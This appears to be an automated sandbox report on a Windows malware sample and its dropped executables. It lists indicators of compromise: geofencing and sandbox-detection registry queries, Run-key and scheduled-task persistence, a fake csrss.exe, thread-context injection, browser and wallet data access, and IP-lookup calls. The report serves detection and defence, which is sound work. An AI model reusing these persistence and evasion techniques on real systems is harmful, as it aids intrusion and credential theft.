djvu | 5a5158c712e1588c621124b5dc4b0c3ebfc064ffc0e2c2623d152e369eb8b8a5

System Information Discovery

Processes:

Install.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 18 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

9x8OVfskAh1tzPMjFGbDngp_.exehubSc3jms7czq0qQMKpyvN61.exeWed21c787120ecdf176.exemshta.exemshta.exeWed214b8335df03a0f.execmd.exeSETUP_~1.EXEWed21e08690b2d5.exemshta.exeUoebYjish2W0eboo9MSvTsGU.exejoDqge54Tv9NCgW49aAyCCam.tmpY6g_9ghG2LvGxIQtlbpjnUyZ.exeInstall.exe5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exeC9mbNTQ5v~O0SE.exeCQNw9xZ0E089eWPXNdTQEPf4.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	9x8OVfskAh1tzPMjFGbDngp_.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	hubSc3jms7czq0qQMKpyvN61.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Wed21c787120ecdf176.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Wed214b8335df03a0f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	SETUP_~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Wed21e08690b2d5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	UoebYjish2W0eboo9MSvTsGU.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	joDqge54Tv9NCgW49aAyCCam.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Y6g_9ghG2LvGxIQtlbpjnUyZ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	C9mbNTQ5v~O0SE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	CQNw9xZ0E089eWPXNdTQEPf4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Install.exe

Loads dropped DLL 14 IoCs

Processes:

setup_install.exeWed214f6ccf7c811f9d.tmpmsiexec.exerundll32.exejoDqge54Tv9NCgW49aAyCCam.tmprundll32.exerundll32.exerundll32.exe

pid	process
4456	setup_install.exe
4456	setup_install.exe
4456	setup_install.exe
4456	setup_install.exe
4456	setup_install.exe
4456	setup_install.exe
3108
4708	Wed214f6ccf7c811f9d.tmp
4696	msiexec.exe
8024	rundll32.exe
9600	joDqge54Tv9NCgW49aAyCCam.tmp
9944	rundll32.exe
9796	rundll32.exe
796	rundll32.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

8640 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
8640	icacls.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Wed2181d5a4917c14c3.exenbM6uULZc4xl1P2c9Ubr3_tU.exeY6g_9ghG2LvGxIQtlbpjnUyZ.exeFVIN5GEmuT3vBSesV3KN4pMp.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QuietVoice = "\"C:\\Windows\\rss\\csrss.exe\""	Wed2181d5a4917c14c3.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	nbM6uULZc4xl1P2c9Ubr3_tU.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	nbM6uULZc4xl1P2c9Ubr3_tU.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\065ffed1-a0e1-4fb9-aa1e-5a6569453ab9\\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe\" --AutoStart"	Y6g_9ghG2LvGxIQtlbpjnUyZ.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	FVIN5GEmuT3vBSesV3KN4pMp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	FVIN5GEmuT3vBSesV3KN4pMp.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

217 ipinfo.io
19 ip-api.com
109 ipinfo.io
110 ipinfo.io
200 ipinfo.io
201 ipinfo.io
202 api.2ip.ua
203 api.2ip.ua
313 api.2ip.ua
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe

flow	ioc
217	ipinfo.io
19	ip-api.com
109	ipinfo.io
110	ipinfo.io
200	ipinfo.io
201	ipinfo.io
202	api.2ip.ua
203	api.2ip.ua
313	api.2ip.ua

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

Wed21f7d3c36e7eaeca0.exeWed21d24a91bba8252.exe6C9E1BGEBW1wZRwgHbmbPXoY.exewdEfSoLBh8dn_Si5mhnq4bhj.exeY6g_9ghG2LvGxIQtlbpjnUyZ.exe

description	pid	process	target process
PID 4460 set thread context of 1152	4460	Wed21f7d3c36e7eaeca0.exe	Wed21f7d3c36e7eaeca0.exe
PID 1296 set thread context of 4420	1296	Wed21d24a91bba8252.exe	Wed21d24a91bba8252.exe
PID 824 set thread context of 3188	824	6C9E1BGEBW1wZRwgHbmbPXoY.exe	6C9E1BGEBW1wZRwgHbmbPXoY.exe
PID 4936 set thread context of 8032	4936		Y6g_9ghG2LvGxIQtlbpjnUyZ.exe
PID 8744 set thread context of 10192	8744	wdEfSoLBh8dn_Si5mhnq4bhj.exe	wdEfSoLBh8dn_Si5mhnq4bhj.exe
PID 9664 set thread context of 8096	9664	Y6g_9ghG2LvGxIQtlbpjnUyZ.exe	Y6g_9ghG2LvGxIQtlbpjnUyZ.exe

Drops file in Program Files directory 2 IoCs

Processes:

CQNw9xZ0E089eWPXNdTQEPf4.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	CQNw9xZ0E089eWPXNdTQEPf4.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	CQNw9xZ0E089eWPXNdTQEPf4.exe

Drops file in Windows directory 2 IoCs

Processes:

Wed2181d5a4917c14c3.exe

description ioc process

File opened for modification C:\Windows\rss Wed2181d5a4917c14c3.exe
File created C:\Windows\rss\csrss.exe Wed2181d5a4917c14c3.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\rss	Wed2181d5a4917c14c3.exe
File created	C:\Windows\rss\csrss.exe	Wed2181d5a4917c14c3.exe

Program crash 21 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2236	1840	WerFault.exe	tllLHrgWRG_VlUzq1KDc4rKs.exe
8136	2548	WerFault.exe	uDDcuNpQTvTCz2c7PHxhjlvt.exe
8732	2548	WerFault.exe	uDDcuNpQTvTCz2c7PHxhjlvt.exe
9052	2548	WerFault.exe	uDDcuNpQTvTCz2c7PHxhjlvt.exe
2132	2548	WerFault.exe	uDDcuNpQTvTCz2c7PHxhjlvt.exe
9156	2548	WerFault.exe	uDDcuNpQTvTCz2c7PHxhjlvt.exe
9764	2548	WerFault.exe	uDDcuNpQTvTCz2c7PHxhjlvt.exe
10052	8564	WerFault.exe	sjKDfCT2kSQ4YhWPHKOoLmSB.exe
8868	1144	WerFault.exe	eCZd8qB60HChZ6SA7X0pv44g.exe
8752	2548	WerFault.exe	uDDcuNpQTvTCz2c7PHxhjlvt.exe
9056	4304	WerFault.exe	lIYgJh5oH3Gd4X2XvUv7TRQa.exe
10156	1144	WerFault.exe	eCZd8qB60HChZ6SA7X0pv44g.exe
9456	1144	WerFault.exe	eCZd8qB60HChZ6SA7X0pv44g.exe
9028	796	WerFault.exe	rundll32.exe
10272	2548	WerFault.exe	uDDcuNpQTvTCz2c7PHxhjlvt.exe
10264	1144	WerFault.exe	eCZd8qB60HChZ6SA7X0pv44g.exe
10660	1144	WerFault.exe	eCZd8qB60HChZ6SA7X0pv44g.exe
11096	1144	WerFault.exe	eCZd8qB60HChZ6SA7X0pv44g.exe
10316	1144	WerFault.exe	eCZd8qB60HChZ6SA7X0pv44g.exe
10196	1144	WerFault.exe	eCZd8qB60HChZ6SA7X0pv44g.exe
31568	2548	WerFault.exe	uDDcuNpQTvTCz2c7PHxhjlvt.exe

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

Wed2135bd1920.exem76D27Rc3RtyxWBYhsjGBluV.exeft04DOugAN_yRClQPKogVWyi.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed2135bd1920.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	m76D27Rc3RtyxWBYhsjGBluV.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ft04DOugAN_yRClQPKogVWyi.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ft04DOugAN_yRClQPKogVWyi.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed2135bd1920.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed2135bd1920.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	m76D27Rc3RtyxWBYhsjGBluV.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	m76D27Rc3RtyxWBYhsjGBluV.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ft04DOugAN_yRClQPKogVWyi.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
10460	schtasks.exe
10448	schtasks.exe
8292	schtasks.exe
12072	schtasks.exe
3916	schtasks.exe
8484	schtasks.exe
10248	schtasks.exe
8476	schtasks.exe
2176	schtasks.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

22320 tasklist.exe
23904 tasklist.exe

pid	process
22320	tasklist.exe
23904	tasklist.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

Install.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1564 taskkill.exe
1572 taskkill.exe
8292 taskkill.exe

pid	process
1564	taskkill.exe
1572	taskkill.exe
8292	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	csrss.exe

Modifies registry class 1 IoCs

Processes:

UoebYjish2W0eboo9MSvTsGU.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings UoebYjish2W0eboo9MSvTsGU.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

11168 reg.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

39240 PING.EXE
26900 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 309 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	UoebYjish2W0eboo9MSvTsGU.exe

pid	process
11168	reg.exe

pid	process
39240	PING.EXE
26900	PING.EXE

description	flow	ioc
HTTP User-Agent header	309	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeWed2135bd1920.exe

pid	process
3996	powershell.exe
3996	powershell.exe
1216	powershell.exe
1216	powershell.exe
1212	Wed2135bd1920.exe
1212	Wed2135bd1920.exe
3996	powershell.exe
3996	powershell.exe
1216	powershell.exe
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

652
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

Wed2135bd1920.exem76D27Rc3RtyxWBYhsjGBluV.exeft04DOugAN_yRClQPKogVWyi.exe

pid process

1212 Wed2135bd1920.exe
5012 m76D27Rc3RtyxWBYhsjGBluV.exe
8504 ft04DOugAN_yRClQPKogVWyi.exe

pid	process
652

pid	process
1212	Wed2135bd1920.exe
5012	m76D27Rc3RtyxWBYhsjGBluV.exe
8504	ft04DOugAN_yRClQPKogVWyi.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Wed214fc5ff02b7.exepowershell.exepowershell.exeWed218c3c4f53dbe01.exeWed21d25f5841.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	4280	Wed214fc5ff02b7.exe
